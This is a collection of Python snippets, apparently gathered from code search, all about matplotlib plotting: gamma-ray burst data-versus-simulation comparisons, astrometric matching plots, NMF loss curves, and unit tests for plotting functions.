\".format(tx=thetax,ty=thetay,c=chi_sq))\n\tax1.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n\tax1.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation (scaling = {s:0.2f},offset = {o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n\tax1.legend()\n ax1.xaxis.set_ticks(np.arange(0,len(data)))\n\tax1.set_ylabel('Counts')\n\tax1.xaxis.grid(linewidth=0.5,alpha=0.3)\n ax1.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n\t\n\tax2.errorbar(np.arange(0,(len(ratio))),ratio,yerr=err_ratio,fmt='.',markersize=2,label=\"Ratio = Data/Model(scaling = {s:0.2f}, offset={o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n\tax2.xaxis.set_ticks(np.arange(0,len(data)))\n ax2.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n ax2.yaxis.set_ticks(np.arange(int(min(ratio-err_ratio)-1),int(max(ratio+err_ratio)+2),1))\n\tax2.tick_params(labelsize=5)\n\tax2.axhline(y=1,linewidth=0.5,color='k')\n\tax2.legend()\n\tax2.set_xlabel('CZT Modules')\n\tax2.set_ylabel('Ratio of counts')\n\tax2.xaxis.grid(linewidth=0.5,alpha=0.3)\n\tplt.tight_layout(h_pad=0.0)\n\tf.set_size_inches([6.5,10])\n\tpdf_file.savefig(f,orientation='portrait') # saves the current figure into a pdf_file page\n\n\t# Plotting comparison graphs with random binning------------------------------\n\t\n sim_flat = sim_dph.flatten()\n\tsim_err_flat = sim_err_dph.flatten()\n grb_flat = grb_dph.flatten()\n bkgd_flat = bkgd_dph.flatten()\n\tsrc_flat = src_dph.flatten()\n\t\n\torder = np.random.permutation(np.arange(0,len(sim_flat)))\n\t\n sim_flat = sim_flat[order]\n\tsim_err_flat = sim_err_flat[order]\n\tgrb_flat = grb_flat[order]\n\tbkgd_flat = bkgd_flat[order]\n\tsrc_flat = src_flat[order]\n\t\n\tbins = np.array(np.sort(np.random.uniform(0,1,comp_bin)*len(sim_flat)),dtype=np.int64)\n\tx = np.zeros(len(bins)+2,dtype=np.int64)\n\tx[0] = 0\n\tx[-1] = len(sim_flat)\n\tx[1:-1] = bins\n\t\n\tsim_flat_bin = np.array([sim_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tsim_err_flat_bin = np.sqrt(np.array([(sim_err_flat[x[i]:x[i+1]]**2).sum() for i in range(comp_bin+1)]))\n\tgrb_flat_bin = np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tgrb_err_flat_bin = np.sqrt(np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tbkgd_flat_bin = np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tbkgd_err_flat_bin = np.sqrt(np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tsrc_flat_bin = np.array([src_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\t\n # Defining model background and data\n #model = sim_flat_bin*scaling\n\tmodel = sim_flat_bin*scaling + intercept\n bkgd = bkgd_flat_bin*t_src/t_tot\n src = grb_flat_bin\n\t\n data = src - bkgd\n\n err_src = np.sqrt(src)\n err_bkgd = np.sqrt(bkgd_flat_bin)\n #err_model = sim_err_flat_bin*scaling\n\terr_model = sim_err_flat_bin*scaling\n err_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tchi_sq_new = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n # PLotting the comparison plots\n fig = plt.figure()\n plt.title(\"Comparison between simulated(scaled) and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq_new))\n plt.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n 
plt.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation (scaling = {s:0.2f}, offset = {o:0.2f})\".format(s=scaling,o=intercept),elinewidth=0.5)\n plt.ylabel('Counts')\n\tplt.xlabel('Random Bins')\n\tplt.xticks(np.arange(0,(len(data)),1))\n\tplt.legend()\n pdf_file.savefig(fig) #saves the current figure into a pdf_file page\n\n\n\t# Plotting observed vs predicted counts--------------------------------------------------------\n\n\tfig = plt.figure()\n plt.title(grbdir + r\" : Observed vs Predicted counts with $\\chi^2$ = {cs:0.1f}\".format(cs=chi_sq))\n plt.errorbar(model_copy,data_copy,xerr=err_model_copy,yerr=err_data_copy,fmt='g.',markersize=2,elinewidth=0.5)\n\tfor i in range(len(model_copy)):\t\n\t\tplt.text(model_copy[i],data_copy[i],Mod_names[i],fontsize=5)\n #plt.plot(np.arange(-1000,1000),fit_line(np.arange(-1000,1000),scaling),'k',linewidth=0.5,label='m = {s:0.2f}'.format(s=scaling))\n\tplt.plot(np.arange(-1000,1000),fit_line_int(np.arange(-1000,1000),scaling,intercept),'k',linewidth=0.5,label='scaling = {s:0.2f}, offset = {i:0.2f}'.format(s=scaling,i=intercept))\n\tplt.plot(np.arange(min(model_copy)-5,max(model_copy)+5),np.ones(len(np.arange(min(model_copy)-5,max(model_copy)+5)))*intercept,'r-',label='intercept',linewidth=0.5)\n plt.xlim(min(model_copy)-5,max(model_copy)+5)\n plt.ylim(min(data_copy)-5,max(data_copy)+5)\n plt.xlabel('Predicted Counts')\n plt.ylabel('Observed Counts')\n\tplt.legend()\n\tplt.grid()\n pdf_file.savefig(fig)\n\t\t\n\tprint \"===============================================================================================\"\n\t\n\treturn", "def plot(self):\n\t\tself.plotOfTF().plot()", "def _plot_robot(self):\n try:\n x = 200\n y = 200\n self.ax1.plot(x, y, marker='o', markersize=10, linestyle='None')\n except Exception as err:\n rospy.loginfo(err)", "def test_chart_parsers():", "def test_y(self):\n g = gca()\n lines = g.get_lines() \n self.assertEqual(lines[0].get_ydata().tolist(), [3, 3, 1, 1, 3])", "def test_default():\n fig, ax = plt.subplots()\n ax.plot([0, 1], [0, 2])\n slide = _get_empty_slide()\n text = ax.set_title(\"TITLE TEXT\")\n ax.set_xlabel(\"X_LABEL\")\n ax.set_ylabel(\"Y_LABEL\")\n shape = figpptx.send(fig, slide=slide)\n assert get_typename(shape) == \"Shape\"\n shapes = _get_shapes(slide, individual=True)\n assert {shape.Type for shape in shapes} == {constants.msoPicture, constants.msoTextBox}", "def test_plot_timeseries_multivariate(tmpdir, random):\n x = np.linspace(start=0, stop=10, num=20)\n ys = np.stack((np.sin(x), np.cos(x), np.tan(0.4 * x)))\n segments = get_test_segments(data=ys)\n output_path = Path(tmpdir) / 'temp_visualization_test_multivariate.png'\n\n plot_timeseries(x=x,\n y=ys.T,\n segments=segments,\n show_plot=False,\n output_filename=output_path)\n\n assert output_path.exists()", "def test_plot_trace(mock_plot, sampler, tmpdir, samples, filename):\n sampler.nested_samples = samples\n sampler.state = MagicMock()\n sampler.state.log_vols = [1, 2, 3, 4]\n sampler.output = os.getcwd()\n\n if filename is not None:\n sampler.output = tmpdir.mkdir(\"test_plot_trace\")\n filename = os.path.join(sampler.output, filename)\n\n fig = NestedSampler.plot_trace(sampler, filename=filename)\n\n if not len(samples):\n mock_plot.assert_not_called()\n assert fig is None\n else:\n mock_plot.assert_called_once_with(\n [2, 3, 4], samples, filename=filename\n )\n assert fig == \"fig\"", "def test_plot_picks(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n pickdb = 
PickDatabaseConnection(':memory:')\n for pick in uniq_picks:\n pickdb.update_pick(**pick)\n splt = SEGYPickPlotter(ax, self.segy, pickdb)\n # should add a single artist to the line dict. for each event\n splt.plot_picks()\n for event in self.pickdb.events:\n self.assertTrue(len(splt.ACTIVE_LINES[event]), 1)\n # should be able to add new picks and have them be accessible by the\n # SEGYPickPlotter\n new_event = '--tracer--'\n new_pick = copy.copy(uniq_picks[0])\n new_pick['event'] = new_event\n pickdb.update_pick(**new_pick)\n splt.plot_picks()\n self.assertTrue(new_event in splt.ACTIVE_LINES)", "def plot(self):\n\t\tself.plotOfSpect().plot()", "def test_call(self):\r\n # A lot of the returned numbers are based on random permutations and\r\n # thus cannot be tested for exact values. We'll test what we can\r\n # exactly, and then test for \"sane\" values for the \"random\" values. The\r\n # matplotlib Figure object cannot be easily tested either, so we'll try\r\n # our best to make sure it appears sane.\r\n obs = self.mc()\r\n\r\n exp_method_name = 'Mantel Correlogram'\r\n self.assertEqual(obs['method_name'], exp_method_name)\r\n\r\n exp_class_index = [0.5757052546507142, 0.60590471266814283,\r\n 0.63610417068557146, 0.66630362870299997, 0.69650308672042849,\r\n 0.72670254473785723, 0.75690200275528574]\r\n assert_almost_equal(obs['class_index'], exp_class_index)\r\n\r\n exp_num_dist = [12, 6, 8, 10, 12, 16, 8]\r\n self.assertEqual(obs['num_dist'], exp_num_dist)\r\n\r\n exp_mantel_r = [0.73244729118260765, 0.31157641757444593,\r\n 0.17627427296718071, None, None, None, None]\r\n self.compare_multiple_level_array(obs['mantel_r'], exp_mantel_r)\r\n\r\n # Test matplotlib Figure for a sane state.\r\n obs_fig = obs['correlogram_plot']\r\n obs_ax = obs_fig.get_axes()[0]\r\n self.assertEqual(obs_ax.get_title(), \"Mantel Correlogram\")\r\n self.assertEqual(obs_ax.get_xlabel(), \"Distance class index\")\r\n self.assertEqual(obs_ax.get_ylabel(), \"Mantel correlation statistic\")\r\n assert_almost_equal(obs_ax.get_xticks(), [0.57, 0.58, 0.59, 0.6,\r\n 0.61, 0.62, 0.63, 0.64, 0.65])\r\n assert_almost_equal(obs_ax.get_yticks(), [0.1, 0.2, 0.3, 0.4, 0.5,\r\n 0.6, 0.7, 0.8, 0.9])\r\n\r\n # Test p-values and corrected p-values.\r\n found_match = False\r\n for i in range(self.p_val_tests):\r\n obs = self.mc()\r\n p_vals = obs['mantel_p']\r\n corr_p_vals = obs['mantel_p_corr']\r\n self.assertEqual(len(p_vals), 7)\r\n self.assertEqual(p_vals[3:], [None, None, None, None])\r\n self.assertTrue(0.0 <= p_vals[0] <= 1.0)\r\n self.assertTrue(0.0 <= p_vals[1] <= 1.0)\r\n self.assertTrue(0.0 <= p_vals[2] <= 1.0)\r\n self.compare_multiple_level_array(corr_p_vals,\r\n [p_val * 3 if p_val is not None else None for p_val in p_vals])\r\n\r\n if (p_vals[0] >= 0 and p_vals[0] <= 0.01 and p_vals[1] > 0.01 and\r\n p_vals[1] <= 0.1 and p_vals[2] > 0.1 and p_vals[2] <= 0.5):\r\n found_match = True\r\n break\r\n self.assertTrue(found_match)", "def plot(self):\n\t\tself.plotOfSpect()", "def test_arguments_6(self):\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n tn0, tn1, tn2 = get_spiral()\n ax.plot(tn0, tn1, tn2, tn1, tn2, tn0)", "def test_plot_save_figure(self):\n pname = os.path.join(\n self.datadir,\n 'monol_testA_E3-50_pds_rebin1.03' + HEN_FILE_EXTENSION)\n hen.plot.main([pname, '--noplot', '--figname',\n os.path.join(self.datadir,\n 'monol_testA_E3-50_pds_rebin1.03.png'),\n '-o', 'dummy.qdp'])", "def test_Figure():\n fig = plt.Figure()\n ax = fig.add_subplot(111)\n ax.add_patch(plt.Circle((0, 0), 1))\n 
ax.add_patch(plt.Rectangle((0, 0), 1, 2))\n\n _assert_output_equal(\n fake_renderer_output(fig, FakeRenderer),\n \"\"\"\n opening figure\n opening axes\n draw path with 25 vertices\n draw path with 4 vertices\n closing axes\n closing figure\n \"\"\",\n )", "def test_plot_lm_list():\n y = [1, 2, 3, 4, 5]\n assert plot_lm(y=y, x=np.arange(len(y)), show=False)", "def plot(self):\n\t\tself.plotOfXray().plot()", "def update_plot():\n pass", "def test_plot_ay_imported():\n assert \"plot_ay\" in sys.modules", "def check_graph(t, RA_main, DEC_main, survey, width,\n gtype=\"all\", add_plotid=True, prefix=None,\n saveplot=True, plotfile=None, plotfile_prefix=None,\n title=None, suptitle=None):\n import math\n import time\n\n import matplotlib.pyplot as plt\n import matplotlib.gridspec as gridspec\n import numpy as np\n from matplotlib.colors import LogNorm\n\n import stats\n import plotid\n\n now = time.localtime(time.time())\n datestamp = time.strftime(\"%Y%m%d\", now)\n function_name = inspect.stack()[0][3]\n\n lineno = str(inspect.stack()[0][2])\n print(mk_timestamp(), function_name, lineno + ':')\n print(function_name + '.saveplot:', saveplot)\n print(function_name + '.plotfile:', plotfile)\n print(function_name + '.prefix: ', plotfile_prefix)\n\n ndata = len(t)\n\n n = 0\n xs = []\n ys = []\n while n < len(t):\n x = ((t[RA_main][n] - t[\"RA_\" + survey.upper()][n]) *\n math.cos((t[DEC_main][n] +\n t[\"DEC_\" + survey][n]) * math.pi / 360.0) * 3600.0)\n y = (t[DEC_main][n] - t[\"DEC_\" + survey.upper()][n]) * 3600.0\n\n if not np.isnan(x) and not np.isnan(y):\n xs.append(x)\n ys.append(y)\n n += 1\n\n n = 0\n xs_s = []\n ys_s = []\n if gtype == \"square\":\n w = width / math.sqrt(2.0)\n while n < len(xs):\n x = xs[n]\n y = ys[n]\n if x <= w and x >= -w and y <= w and y >= -w:\n xs_s.append(xs[n])\n ys_s.append(ys[n])\n n += 1\n\n xs = xs_s\n ys = ys_s\n\n xs1 = list(xs) + []\n ys1 = list(ys) + []\n\n RA_med = np.median(xs1)\n DEC_med = np.median(ys1)\n RA_MAD = stats.MAD(xs1, RA_med)\n DEC_MAD = stats.MAD(ys1, DEC_med)\n print(\"Number of points\", len(xs))\n print(\"RA offset\", RA_med, \"DEC offset\", DEC_med)\n print(\"RA MAD\", RA_MAD, \"DEC MAD\", DEC_MAD)\n print(\"RA Sigma MAD\", 1.486 * RA_MAD, \"DEC Sigma DEC\", 1.486 * DEC_MAD)\n print(\"RA Median Error\", 1.486 * RA_MAD / math.sqrt(len(xs)),\n \"DEC Median Error\", 1.486 * DEC_MAD / math.sqrt(len(ys)))\n print()\n if len(xs) == 0:\n print(\"No matches\")\n return RA_med, DEC_med\n\n gs = gridspec.GridSpec(2, 2, width_ratios=[2, 1], height_ratios=[1, 2])\n fig = plt.figure()\n ax1 = plt.subplot(gs[0])\n ax1.hist(xs, bins=100, color=\"r\")\n ax1.set_xlim(-2.0, 2.0)\n ax1.axes.get_xaxis().set_visible(False)\n ax1.set_ylabel(\"Number\")\n\n ax2 = plt.subplot(gs[2])\n # ax2.plot(xs, ys, \"k+\")\n if len(xs) > 100:\n plt.hist2d(xs, ys, bins=100, cmap=\"binary\", norm=LogNorm())\n else:\n plt.plot(xs, ys, \"k.\", ms=2)\n ax2.set_ylim(-2.0, 2.0)\n ax2.set_xlim(-2.0, 2.0)\n ax2.set_xlabel('Delta RA /\"')\n ax2.set_ylabel('Delta Dec /\"')\n labels1 = ax2.get_xticks()\n ax2.set_xticklabels(labels1, rotation=270)\n\n if suptitle is None:\n fig.suptitle(\"Errors in matching: \" +\n survey + ': ' + str(ndata), fontsize='small')\n\n if suptitle is not None:\n fig.suptitle(suptitle + ': ' + str(ndata), fontsize='small')\n\n ax3 = plt.subplot(gs[3])\n ax3.hist(ys, bins=100, orientation=\"horizontal\", color=\"r\")\n ax3.set_ylim(-2.0, 2.0)\n ax3.set_xlabel(\"Number\")\n ax3.axes.get_yaxis().set_visible(False)\n labels2 = ax3.get_xticks()\n 
ax3.set_xticklabels(labels2, rotation=270)\n\n ax4 = plt.subplot(gs[1])\n ax4.annotate(\"Number of points: \" +\n str(len(xs)), xy=(0.01, 0.1), size=\"small\")\n ax4.annotate(\"RA offset: {0:.4f}\".format(RA_med) +\n '\"', xy=(0.01, 0.90), size=\"small\")\n ax4.annotate(\"DEC offset: {0:.4f}\".format(DEC_med) +\n '\"', xy=(0.01, 0.8), size=\"small\")\n ax4.annotate(\"RA MAD: {0:.4f}\".format(RA_MAD) +\n '\"', xy=(0.01, 0.7), size=\"small\")\n ax4.annotate(\"DEC MAD: {0:.4f}\".format(DEC_MAD) +\n '\"', xy=(0.01, 0.6), size=\"small\")\n ax4.annotate(\"RA median error: {0:.4f}\".\n format(1.486 * RA_MAD / math.sqrt(len(xs))) + '\"',\n xy=(0.01, 0.5), size=\"small\")\n ax4.annotate(\"DEC median error: {0:.4f}\".\n format(1.486 * DEC_MAD / math.sqrt(len(ys))) + '\"',\n xy=(0.01, 0.4), size=\"small\")\n ax4.annotate(\"RA sigma MAD: {0:.4f}\".format(RA_MAD * 1.486) +\n '\"', xy=(0.01, 0.3), size=\"small\")\n ax4.annotate(\"DEC sigma MAD: {0:.4f}\".format(DEC_MAD * 1.486) +\n '\"', xy=(0.01, 0.2), size=\"small\")\n\n ax4.axes.get_xaxis().set_visible(False)\n ax4.axes.get_yaxis().set_visible(False)\n\n if saveplot:\n lineno = str(inspect.stack()[0][2])\n print(mk_timestamp(), function_name, lineno)\n if add_plotid:\n plotid.plotid()\n if plotfile is None:\n plotfile = 'match'\n if plotfile_prefix is not None:\n plotfile = plotfile_prefix + '_match_' + datestamp + '.png'\n if plotfile_prefix is None:\n plotfile = 'match_' + datestamp + '.png'\n\n print('Saving: ', plotfile)\n plt.savefig(plotfile)\n\n plt.show()\n\n return RA_med, DEC_med", "def test_plot_timeseries_univariate(tmpdir, random):\n x = np.linspace(0, 10, 20)\n y = np.sin(x)\n segments = get_test_segments(data=np.expand_dims(y, 0))\n\n output_path = Path(tmpdir) / 'temp_visualization_test_univariate.png'\n\n plot_timeseries(x=x,\n y=y,\n segments=segments,\n show_plot=False,\n output_filename=output_path)\n\n assert output_path.exists()", "def test_plot(arg):\n source_data = data.Biofile(arg)\n sample = source_data.get_header()\n feature = source_data.get_index()\n sample_size, feature_size = 106, 12042\n sample = sample[:sample_size]\n #xshape = (106 12042)\n print(sample, feature)\n X = source_data.get_matrix().T[:sample_size, :feature_size]\n mx = 100\n labs = ['rbf','poly','sigmoid']\n semi_r = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter = mx, parameter = 100) #rbf 0.5\n semi_r_con = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter = mx, kernel='poly', parameter= 0.5)#ploy 2\n semi_r_con1 = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter=mx, kernel='sigmoid', parameter= 0.1) #sigmoid 0.5\n semi_r_con2 = util.convex_non_negative_factorization(X.T, max_iter=mx, n_components=2)\n\n #semi_r = util.semi_non_negative_factorization_with_straint(X.T, max_iter = mx,n_components=2 ,initialization= 'Kmeans',alpha = 0.01, beta = 0.01)\n #semi_r_con = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2 ,initialization= 'Kmeans',alpha= 10, beta = 10)\n #semi_r_con1 = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2, initialization= 'Kmeans',alpha= 0, beta = 10)\n #semi_r_con2 = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2, initialization= 'Kmeans',alpha= 10, beta = 0)\n #convex_r_con = util.convex_non_negative_factorization(X.T, n_components=2, max_iter=mx)\n\n G, G1, G2, G3 = semi_r[1], semi_r_con[1], semi_r_con1[1], semi_r_con2[1]\n result, result1, result2, result3 = semi_r[2], 
semi_r_con[2], semi_r_con1[2], semi_r_con2[2]\n x = [i for i in range(mx)]\n # plot the losses function\n plt.title(\"losses function of {}\".format(arg[:-4]))\n plt.xlabel(\"iteration times\")\n plt.ylabel(\"losses\")\n\n plt.plot(x, result[:mx], 'r', marker = '.', label = 'kNMF({})'.format(labs[0]))\n plt.plot(x, result1[:mx], 'b', marker ='.' , label = 'kNMF({})'.format(labs[1]))\n plt.plot(x, result2[:mx], 'c', marker ='.', label = 'kNMF({})'.format(labs[2]))\n plt.plot(x, result3[:mx], 'm', marker ='.', label = 'cvxnmf')\n \"\"\"\n plt.plot(x, result[:mx], 'r', marker = '.', label = 'sNMF')\n plt.plot(x, result1[:mx], 'b', marker ='.' , label = 'sNMF(0.5,0.5)')\n plt.plot(x, result2[:mx], 'c', marker ='.', label = 'sNMF(0,0.5)')\n plt.plot(x, result3[:mx], 'm', marker ='.', label = 'sNMF(0.5,1)')\n plt.plot(x, result4[:mx], 'k', marker = '.', label = 'cvx-NMF')\n \"\"\"\n plt.legend(bbox_to_anchor=[1,1])\n plt.grid()\n plt.show()\n\n #plot the clustering result\n plt1 = plt\n plt1.subplot(221)\n plt1.plot(G[:,0], G[:,1], 'ro')\n plt1.title(u'the distribution of items(knmf({}))'.format(labs[0]))\n #items = zip(sample, G)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(222)\n plt1.plot(G1[:,0], G1[:,1], 'bo')\n\n plt1.title(u'the distribution of items(knmf({}))'.format(labs[1]))\n\n #items = zip(sample, G1)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(223)\n plt1.plot(G2[:,0], G2[:,1], 'co')\n plt1.title(u'the distribution of items((knmf({}))'.format(labs[2]))\n #items = zip(sample, G4)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(224)\n plt1.plot(G3[:,0], G3[:,1], 'mo')\n plt1.title(u'the distribution of items(convex-nmf))')\n #items = zip(sample, G2)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.show()", "def test_init_SEGYPickPlotter(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n splt = SEGYPickPlotter(ax, self.segy, pickdb=self.pickdb)\n # should inherit from SEGYPlotter\n for member in inspect.getmembers(SEGYPlotter):\n self.assertTrue(hasattr(splt, member[0]))\n # should build header lookup table\n self.assertTrue(isinstance(splt.sdb, SEGYHeaderDatabase))\n # should attach axes\n self.assertTrue(isinstance(splt.ax, matplotlib.axes.Axes))", "def test_plot_ts(kwargs):\n nchains = 4\n ndraws = 500\n obs_data = {\n \"y\": 2 * np.arange(1, 9) + 3,\n \"z\": 2 * np.arange(8, 12) + 3,\n }\n\n posterior_predictive = {\n \"y\": np.random.normal(\n (obs_data[\"y\"] * 1.2) - 3, size=(nchains, ndraws, len(obs_data[\"y\"]))\n ),\n \"z\": np.random.normal(\n (obs_data[\"z\"] * 1.2) - 3, size=(nchains, ndraws, len(obs_data[\"z\"]))\n ),\n }\n\n const_data = {\"x\": np.arange(1, 9), \"x_pred\": np.arange(8, 12)}\n\n idata = from_dict(\n observed_data=obs_data,\n posterior_predictive=posterior_predictive,\n constant_data=const_data,\n coords={\"obs_dim\": np.arange(1, 9), \"pred_dim\": np.arange(8, 12)},\n dims={\"y\": [\"obs_dim\"], \"z\": [\"pred_dim\"]},\n )\n\n ax = plot_ts(idata=idata, 
y=\"y\", show=True, **kwargs)\n assert np.all(ax)", "def test_signals(self):\n G = graphs.Sensor()\n G.plot()\n def test_color(param, length):\n for value in ['r', 4*(.5,), length*(2,), np.ones([1, length]),\n np.random.RandomState(42).uniform(size=length),\n np.ones([length, 3]), [\"red\"] * length,\n np.random.RandomState(42).rand(length, 4)]:\n params = {param: value}\n G.plot(**params)\n for value in [10, (0.5, 0.5), np.ones([length, 2]),\n np.ones([2, length, 3]),\n np.ones([length, 3]) * 1.1]:\n params = {param: value}\n self.assertRaises(ValueError, G.plot, **params)\n for value in ['r', 4*(.5)]:\n params = {param: value, 'backend': 'pyqtgraph'}\n self.assertRaises(ValueError, G.plot, **params)\n test_color('vertex_color', G.n_vertices)\n test_color('edge_color', G.n_edges)\n def test_size(param, length):\n for value in [15, length*(2,), np.ones([1, length]),\n np.random.RandomState(42).uniform(size=length)]:\n params = {param: value}\n G.plot(**params)\n for value in [(2, 3, 4, 5), np.ones([2, length]),\n np.ones([2, length, 3])]:\n params = {param: value}\n self.assertRaises(ValueError, G.plot, **params)\n test_size('vertex_size', G.n_vertices)\n test_size('edge_width', G.n_edges)", "def test_plot_log(self):\n pname = os.path.join(\n self.datadir,\n 'monol_testA_E3-50_pds_rebin1.03' + HEN_FILE_EXTENSION)\n cname = os.path.join(\n self.datadir,\n 'monol_test_E3-50_cpds_rebin1.03' + HEN_FILE_EXTENSION)\n hen.plot.main([pname, cname, '--noplot', '--xlog', '--ylog',\n '-o', 'dummy.qdp'])\n hen.plot.main([pname, '--noplot', '--axes', 'power', 'power_err',\n '--xlin', '--ylin',\n '-o', 'dummy.qdp'])", "def test_arguments_7(self):\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n tn0, tn1, tn2 = get_spiral()\n ax.plot(tn0, tn1, tn2, 'C3:', tn1, tn2, tn0)", "def test():\n data1 = resources_vs_time(0.0, 50)\n data2 = resources_vs_time(1.0, 10)\n data3 = resources_vs_time(2.0, 10)\n data4 = resources_vs_time(0.5, 10)\n print data1\n simpleplot.plot_lines(\"Growth\", 600, 600, \"time\", \"total resources\", [data1])", "def showPlot1(): \n raise NotImplementedError", "def test_plot_lm(models, kwargs):\n idata = models.model_1\n if \"constant_data\" not in idata.groups():\n y = idata.observed_data[\"y\"]\n x1data = y.coords[y.dims[0]]\n idata.add_groups({\"constant_data\": {\"_\": x1data}})\n idata.constant_data[\"x1\"] = x1data\n idata.constant_data[\"x2\"] = x1data\n\n axes = plot_lm(idata=idata, y=\"y\", y_model=\"eta\", xjitter=True, **kwargs)\n assert np.all(axes)", "def builtin_plot(self, **kwargs):\n self.gp.plot(**kwargs)\n return", "def show_plot() :\n logger.info(\"Show plot\")\n pylab.axis('equal')\n pylab.xlabel(\"Longitud\")\n pylab.ylabel(\"Latitud\")\n pylab.grid(True)\n pylab.title(\"Product tiles and product source\")\n pylab.show()", "def test_plot_csv(self, script_runner: ScriptRunner, tmp_path: Path) -> None:\n outfile = tmp_path.joinpath(\"projection.png\")\n logfile = tmp_path.joinpath(\"plot.log\")\n result = script_runner.run(\n \"qaa\",\n \"plot\",\n \"-i\",\n PROJ,\n \"-o\",\n outfile.as_posix(),\n \"-l\",\n logfile.as_posix(),\n \"--pca\",\n \"--verbose\",\n )\n assert result.success\n assert logfile.exists()\n assert outfile.exists()\n assert outfile.stat().st_size > 0", "def test_data(fig_ref, fig_test):\n tn0, tn1, tn2 = get_spiral()\n\n ax = fig_test.add_subplot(projection='ternary')\n data = {'tn0': tn0, 'tn1': tn1, 'tn2': tn2}\n ax.plot('tn0', 'tn1', 'tn2', data=data)\n\n ax = fig_ref.add_subplot(projection='ternary')\n ax.plot(tn0, tn1, 
tn2)", "def test_create_plot(self):\n create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1}],\n validate=True\n )\n create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1}],\n xaxis_range='0:10',\n validate=True\n )\n # Have an error raised if values of invalid data type are given\n with self.assertRaises(ValueError):\n create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 'abc'}],\n xaxis_range='0:10',\n validate=True\n )\n with self.assertRaises(ValueError):\n create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1, 'label': [], 'range': '0-10'}],\n xaxis_range='0:10',\n validate=True\n )\n # Get dictionary serialization of command arguments. Ensure that we\n # can create a valid command instance from the returned result.\n obj = create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1}],\n xaxis_range='0:10',\n validate=True\n ).arguments.to_list()\n ModuleCommand(\n package_id=plot.PACKAGE_PLOT,\n command_id=plot.PLOT_SIMPLE_CHART,\n arguments=obj,\n packages=PACKAGES\n )\n # Delete a mandatory element from the serialization to ensure that\n # validation fails\n index = -1\n for i in range(len(obj)):\n if obj[i][ARG_ID] == plot.PARA_SERIES:\n index = i\n break\n del obj[i]\n with self.assertRaises(ValueError):\n ModuleCommand(\n package_id=plot.PACKAGE_PLOT,\n command_id=plot.PLOT_SIMPLE_CHART,\n arguments=obj,\n packages=PACKAGES\n )\n # Add an unknown argument to ensure that the validation fails\n obj = create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1}],\n xaxis_range='0:10',\n validate=True\n ).arguments.to_list()\n obj.append(ARG(id='someUnknownLabel', value=''))\n with self.assertRaises(ValueError):\n ModuleCommand(\n package_id=plot.PACKAGE_PLOT,\n command_id=plot.PLOT_SIMPLE_CHART,\n arguments=obj,\n packages=PACKAGES\n )", "def test_simple(make_plots=False):\n # Define the example you want to investigate:\n r1 = GeneralRandom(np.arange(10), np.ones(10), 100)\n r2 = GeneralRandom(np.arange(5), np.ones(5), 20)", "def test_make_plot_log(self):\n print(sys._getframe().f_code.co_name)\n try:\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n pp.make_plot(x,y,plot_type='d',y_axis_type='log',xticks=[0,1,2,3], yticks=[0,1,2,3])\n except Exception as e:\n raise\n plt.close('all')", "def visualize_test(test_data_full, test_data, thetas):\n fig, ax = plt.subplots()\n ax.scatter(test_data_full[\"Weight\"], test_data_full[\"Height\"], color='blue')\n ax.plot(test_data_full[\"Weight\"], predict(test_data, thetas[-1]), color='red', linewidth=2)\n return fig", "def plot(self):\n\t\tself.plotOfHeatingCurrent().plot()", "def test_init_SEGYPlotter(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n splt = SEGYPlotter(ax, self.segy)\n # should inherit from SEGYPlotManager\n for member in inspect.getmembers(SEGYPlotManager):\n 